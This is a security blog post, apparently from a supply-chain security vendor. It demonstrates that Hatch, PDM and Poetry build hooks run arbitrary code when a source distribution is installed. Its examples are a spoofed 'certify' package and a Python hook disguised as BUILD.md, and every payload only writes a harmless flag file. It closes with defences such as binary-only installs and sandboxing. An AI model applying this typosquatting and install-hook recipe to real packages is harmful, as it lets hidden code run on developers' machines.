Modern Python Build Hooks

This blog series has already shown the common infection method for most Python malware is allowing source distributions when installing packages. Weβve also seen most malware gain execution by running from the setup.py
file. Thatβs old news and more likely to be noticed. Attackers want to be modern, too. Isnβt there a way they can gain arbitrary code execution with the pyproject.toml
file? It turns out there is.
Some build backends provide build hooks for modifying the inputs and outputs of source and built distribution creation. Hatch and PDM are two examples of package managers with related build backends offering build hook functionality. There may be others (see addendum for Poetry at the end of this post). Hatch provides a popular build backend in hatchling
so weβll start with it to demonstrate the process.
Spoofing pyproject.toml
projects
Weβll start with the same certifi
package that has been used throughout this series. To show just how useful Hatch is for package management, the process will be shown from the beginning. The process for spoofing pyproject.toml
projects will mimic the one used in the post showing how to do so for setup.py
projects.
First, be sure hatch
is installed. I prefer the pipx
method. Then, clone the repository for the legitimate certifi
package and switch into the new directory:
β― pipx install hatch
installed package hatch 1.10.0, installed using Python 3.12.3
These apps are now globally available
- hatch
done! β¨ π β¨
β― git clone git@github.com:certifi/python-certifi.git python-certify
Cloning into 'python-certify'...
remote: Enumerating objects: 934, done.
remote: Counting objects: 100% (278/278), done.
remote: Compressing objects: 100% (127/127), done.
remote: Total 934 (delta 207), reused 152 (delta 151), pack-reused 656
Receiving objects: 100% (934/934), 1.34 MiB | 668.00 KiB/s, done.
Resolving deltas: 100% (473/473), done.
Install Hatch and clone the certifi
repo
Next, use Hatch to initialize the existing project. This is a nice feature since it will automatically convert the old setuptools
configuration using setup.py
to the modern PEP 518 pyproject.toml
format, adhering to PEP 621 to boot!
## Initialize the existing project
β― hatch --no-interactive new --init
Migrating project metadata from setuptools
## The output indicates a successful migration, but what did it do?
β― git status --short
?? pyproject.toml
## Okay, it added a `pyproject.toml` file. Is that enough to build now?
β― hatch build
ββββββββββββββββ sdist ββββββββββββββββ
dist/certifi-2024.2.2.tar.gz
ββββββββββββββββ wheel ββββββββββββββββ
dist/certifi-2024.2.2-py3-none-any.whl
Use Hatch to convert setup.py
metadata to pyproject.toml
That was easy. A few commands and we were able to create source and built distributions from an automagically generated, standards-compliant, pyproject.toml
file. However, we didnβt seek to rebuild the wheel. We want to create a spoofed package that doesnβt rely on setup.py
to run our bad code. To do that, we need to make some modifications to pyproject.toml
. For reference, here is the original that Hatch generated:
[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
name = "certifi"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = "MPL-2.0"
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
]
[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
[tool.hatch.version]
path = "certifi/__init__.py"
[tool.hatch.build.targets.sdist]
include = [
"/certifi",
]
The pyproject.toml
file generated by Hatch
Weβll add it to source control (git add pyproject.toml
) so changes will be more obvious. The first change to make is to rename the project from certifi
to certify
. Hatchβs logic to automatically detect files to be included when building a wheel relies on the project name matching the file structure. Just like in the previous post about package spoofing, we want a fake distribution package while retaining the import package naming structure. To do that, we need to override the default logic and tell Hatch where to find the files. Here are the changes made in pyproject.toml
to meet those goals:
β― git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..74d720b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
@@ -40,3 +40,8 @@ path = "certifi/__init__.py"
include = [
"/certifi",
]
+
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
Diff view in pyproject.toml
after spoofing changes
These changes are enough to build a spoofed package with both source and built distributions.
β― hatch build
ββββββββββββββββ sdist ββββββββββββββββ
dist/certify-2024.2.2.tar.gz
ββββββββββββββββ wheel ββββββββββββββββ
dist/certify-2024.2.2-py3-none-any.whl
Building distributions with Hatch
Notice that the distribution package is now certify
. After installation, the import package is still certifi
. Thatβs great but it doesnβt provide much in the way of new techniques. Sure, Hatch can be used to convert setup.py
projects to pyproject.toml
ones, but let's crack some eggs and get messy.
Hatching evil plans
Hatch is very much a modern tool, adhering to the latest packaging standards. It eschews the legacy methods of defining metadata and package configuration in a setup.py
file, which is essentially an arbitrary code execution vector. Instead, it adopts pyproject.toml
as the PEP 518 compliant plaintext configuration file. Thereβs no way arbitrary code can run from a config file, right? Right!? You may be asking, βWhat about my custom package generation steps? How am I supposed to compile extensions for all the various platform types my project supports?β
Hatch has you covered. Hatch provides build hooks to get around this limitation. These build hooks are offered in the form of plugins, either third-party (i.e., more build requirements) or first-party by adhering to a reference plugin interface. The interface allows for writing code that will be executed at one or more points in the build process:
clean
: occurs before the build process if the-c
/βclean
flag was passed to thebuild
command, or when invoking theclean
commandinitialize
: occurs immediately before each buildfinalize
: occurs immediately after each build
Additionally, Hatch provides one built-in build hook named custom
. It is this hook that will be used to deliver our malicious payload since it requires the least amount of additional code. It is enabled with a single line added to the pyproject.toml
configuration:
[tool.hatch.build.targets.wheel.hooks.custom]
The default configuration for this custom build hook specifies hatch_build.py
as the file containing the custom implementation of the interface. The file name and/or path can be different but weβll use the default for this example to avoid adding another line to pyproject.toml
. For reference, this is now the full difference in the configuration file as compared to the one initially generated by Hatch:
β― git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..889ab73 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
@@ -40,3 +40,12 @@ path = "certifi/__init__.py"
include = [
"/certifi",
]
+
+# This section is required because the project name
+# was changed and no longer matches the package name.
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
+
+# This empty table entry triggers execution of the
+# `hatch_build.py` module when building wheels.
+[tool.hatch.build.targets.wheel.hooks.custom]
Diff view in pyproject.toml
after enabling build hooks
Next, weβll write a minimal plugin implementation using hatch_build.py
. We choose to use the initialize
entry point since it is more likely to run for every build (the finalize
entry point may not be called if the build fails). The βmaliciousβ code simply adds a file to a temporary directory to serve as a flag indicating when the code runs. Real malware would be more complex and likely obfuscated.
from hatchling.builders.hooks.plugin.interface import BuildHookInterface
class CustomBuildHook(BuildHookInterface):
def initialize(self, version, build_data):
# Code in this function will run before building
with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
f.write("Malware could have run here")
Build hook with "malware" in hatch_build.py
Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run:
## With only two added and modified files...
β― git status --short
AM pyproject.toml
?? hatch_build.py
## ...we can build a spoofed source distribution that
## contains those files, to be used when building a wheel
β― hatch build --target sdist
ββββββββββββββββ sdist ββββββββββββββββ
dist/certify-2024.2.2.tar.gz
## Create a Python virtual environment
β― python -m venv .venv
## ...and activate it for demo use
β― source .venv/bin/activate
## See that there is no flag present
β― ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Installing the package does not indicate anything bad happened...
β― python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
Building wheel for certify (pyproject.toml) ... done
Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164156 sha256=105c8292d17e6976de036db187899f12c0c28dd7a6cf6a31b03b6a094c718e95
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2
## ...but now there is a "flag.txt" file...
β― ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 2 12:57 /private/tmp/flag.txt
## ...which proves that any arbitrary code can run in "hatch_build.py"
β― cat /private/tmp/flag.txt
Malware could have run here
Source distribution used to execute payload during wheel build step of package installation
PDM FTW
The same process works when using the build hooks offered by the pdm-backend
package that comes from the PDM project. Here is what that looks like, using the same certifi
package as a starting point.
## Install PDM (I prefer using pipx)
β― pipx install pdm
installed package pdm 2.15.1, installed using Python 3.12.3
These apps are now globally available
- pdm
done! β¨ π β¨
## Clone the legitimate `certifi` package repo and switch into directory
β― git clone git@github.com:certifi/python-certifi.git python-certify-pdm
Cloning into 'python-certify-pdm'...
remote: Enumerating objects: 971, done.
remote: Counting objects: 100% (314/314), done.
remote: Compressing objects: 100% (143/143), done.
remote: Total 971 (delta 226), reused 196 (delta 171), pack-reused 657
Receiving objects: 100% (971/971), 1.35 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (492/492), done.
## Use Hatch to migrate from `setup.py` to `pyproject.toml`
β― hatch --no-interactive new --init
Migrating project metadata from setuptools
## Add the configuration file to source control, for later diffs
β― git add pyproject.toml
Install PDM and use Hatch to initiate the spoofed project
At this point, the pyproject.toml
file looks like the one from before, when Hatch was used. It needs a few adjustments to be used with PDM. For starters, the build backend has to change. Plus, some PEP 621 metadata fields need to be updated to match the expected format even though the content is fine. After those modifications, the pyproject.toml
file looks like this:
[build-system]
requires = ["pdm-backend"]
build-backend = "pdm.backend"
[project]
name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
]
[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
[tool.pdm.version]
source = "file"
path = "certifi/__init__.py"
PDM and project configuration in pyproject.toml
Here is the difference from the one generated by Hatch:
β― git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..29302fd 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,13 +1,13 @@
[build-system]
-requires = ["hatchling"]
-build-backend = "hatchling.build"
+requires = ["pdm-backend"]
+build-backend = "pdm.backend"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
-license = "MPL-2.0"
+license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
@@ -33,10 +33,6 @@ classifiers = [
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
-[tool.hatch.version]
+[tool.pdm.version]
+source = "file"
path = "certifi/__init__.py"
-
-[tool.hatch.build.targets.sdist]
-include = [
- "/certifi",
-]
Diff view in pyproject.toml
after converting metadata from Hatch to PDM specifications
Enabling PDM build hooks is as easy as creating a pdm_build.py
module in the root of the project directory and populating it with one or more of the defined functions from the build hook interface API. The module name can be different but requires an additional entry in the pyproject.toml
configuration. This is a minimal pdm_build.py
implementation used to plant our flag for wheel builds:
def pdm_build_hook_enabled(context):
# Only enable for wheel builds
return context.target == "wheel"
def pdm_build_initialize(context):
# Code in this function will run before building
with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
f.write("Malware could have run here")
Build hooks with "malware" in pdm_build.py
Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run. The demonstration steps are essentially the same as for Hatch, but this time the virtual environment is created before building the source distribution so PDM will use it instead of creating one.
## There are only two added and modified files
β― git status --short
AM pyproject.toml
?? pdm_build.py
## Create a Python virtual environment and activate it for use
β― python -m venv .venv && source .venv/bin/activate
## We can build a spoofed source distribution containing
## the new files, to be used when building a wheel
β― pdm build --no-wheel --quiet
Building sdist...
INFO: Inside an active virtualenv /Users/maxrake/dev/phylum/python-certify-pdm/.venv, reusing it.
Set env var PDM_IGNORE_ACTIVE_VENV to ignore it.
Built sdist at /Users/maxrake/dev/phylum/python-certify-pdm/dist/certify-2024.2.2.tar.gz
## See that there is no flag present
β― ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Installing the package does not indicate anything bad happened...
β― python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
Building wheel for certify (pyproject.toml) ... done
Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164138 sha256=c3b6cc5f67b526e88e125f1b806ac3fb9157b93f150c94c7e8f2a9ac7adb214a
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/8e/48/d3/1f7efdb8dc7d9332f1d58da9b9ac3e9659c43b286dccde8584
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2
## ...but now there is a "flag.txt" file...
β― ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 6 11:28 /private/tmp/flag.txt
## ...which proves that any arbitrary code can run in "pdm_build.py"
β― cat /private/tmp/flag.txt
Malware could have run here
Source distribution used to execute payload during wheel build step of package installation
Modern hard hats and safety goggles
Once again, it has been shown that allowing source distributions to be installed anywhere in the fully resolved dependency chain introduces risk. The risk of executing arbitrary code contained within one of those source distributions is not limited to legacy setup.py
structures. Modern package managers like Hatch and PDM allow for build hooks in modern pyproject.toml
projects. Installing a source distribution means building the wheel that is ultimately installed, which means the hook code in hatch_build.py
, pdm_build.py
, or any custom-configured module will run.
If possible, disallow all source distributions during install. The pip
documentation provides a guide for secure installs that recommends passing --only-binary :all:
to meet the goal. It appears that Poetry
allows configurations to specify no binaries (i.e., wheels) but no such option for source distributions exists. Other package installers likely suffer the same limitation.
--cta--
One countermeasure to this class of attack is to run all package installation actions through an application sandbox. This restricts the actions available to only those filesystem and network operations deemed legitimate and effectively neuters malicious code. Phylum offers this protection in the form of the open-source Birdcage sandbox, which is baked into the Phylum CLI and can be used for Python developers using pip
or Poetry
with the matching official extensions.
Addendum: Undocumented Poetry build hooks
It is indeed possible to include build hooks with Poetry using either the legacy poetry
build backend or the modern poetry-core
one. This is an undocumented feature but has existed since the earliest days of the project. For some background and insights about the inner workings of this feature, reference these GitHub issues from the Poetry project:
- The eleventh issue ever, first talking about this feature
- An issue requesting the feature to be stabilized and documented
- An issue showing an alternate configuration for the newer
poetry-core
build backend
To demonstrate the use of Poetry for malicious purposes, we alter our very own phylum
project and spoof it as phylum-ci
, but with an added Python module disguised as a Markdown file.
## Clone the `phylum` package and switch into directory
β― git remote -v
origin git@github.com:phylum-dev/phylum-ci.git (fetch)
origin git@github.com:phylum-dev/phylum-ci.git (push)
## See that only two files need to be modified/added
β― git status --short
M pyproject.toml
?? BUILD.md
## Spoof the package by changing the name to `phylum-ci`
## and activate a build hook by specifying a `build` file
β― git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index ca0326a..6cfb131 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,8 +5,9 @@ requires = ["poetry-core>=1.8.1"]
build-backend = "poetry.core.masonry.api"
[tool.poetry]
-name = "phylum"
+name = "phylum-ci"
version = "0.44.0"
+build = "BUILD.md"
description = "Utilities for integrating Phylum into CI pipelines (and beyond)"
license = "GPL-3.0-or-later"
authors = ["Phylum, Inc. <engineering@phylum.io>"]
## The build file can be named anything! We seek to blend in here.
## It still needs to contain Python code and a `build()` function.
β― cat BUILD.md
def build():
with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
f.write("Malware could have run here")
if __name__ == "__main__":
build()
## Build the source distribution
β― poetry build --format=sdist
Preparing build environment with build-system requirements poetry-core>=1.8.1
Building phylum-ci (0.44.0)
- Building sdist
- Built phylum_ci-0.44.0.tar.gz
## Create a virtual environment and activate it
β― python -m venv delme_venv && source delme_venv/bin/activate
## Ensure the pip package cache is empty
β― python -m pip cache purge
Files removed: 3
## Show that there is no flag present
β― ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Install the spoofed package
β― python -m pip install dist/phylum_ci-0.44.0.tar.gz
Processing ./dist/phylum_ci-0.44.0.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting cryptography (from phylum-ci==0.44.0)
Downloading cryptography-42.0.7-cp39-abi3-macosx_10_12_universal2.whl.metadata (5.3 kB)
---TRIMMED-FOR-BREVITY---
Building wheels for collected packages: phylum-ci
Building wheel for phylum-ci (pyproject.toml) ... done
Created wheel for phylum-ci: filename=phylum_ci-0.44.0-cp312-cp312-macosx_14_0_arm64.whl size=85083 sha256=8988365340f735e504d06a713cf79e7d5c17c3fe431d15553306246202559aa4
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/47/cb/ad/69829b41685d144709dd92559c13e18e25d141402d0b40573d
Successfully built phylum-ci
Installing collected packages: urllib3, ruamel.yaml.clib, pygments, pycparser, packaging, mdurl, idna, charset-normalizer, certifi, ruamel.yaml, requests, markdown-it-py, cffi, rich, cryptography, phylum-ci
Successfully installed certifi-2024.2.2 cffi-1.16.0 charset-normalizer-3.3.2 cryptography-42.0.7 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 packaging-24.0 phylum-ci-0.44.0 pycparser-2.22 pygments-2.18.0 requests-2.31.0 rich-13.7.1 ruamel.yaml-0.18.6 ruamel.yaml.clib-0.2.8 urllib3-2.2.1
## See that the flag has been planted...
β― ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 8 15:33 /private/tmp/flag.txt
## ...proving that arbitrary code execution is possible.
β― cat /private/tmp/flag.txt
Malware could have run here
Executing arbitrary code disguised as a Markdown file by using Poetry build hooks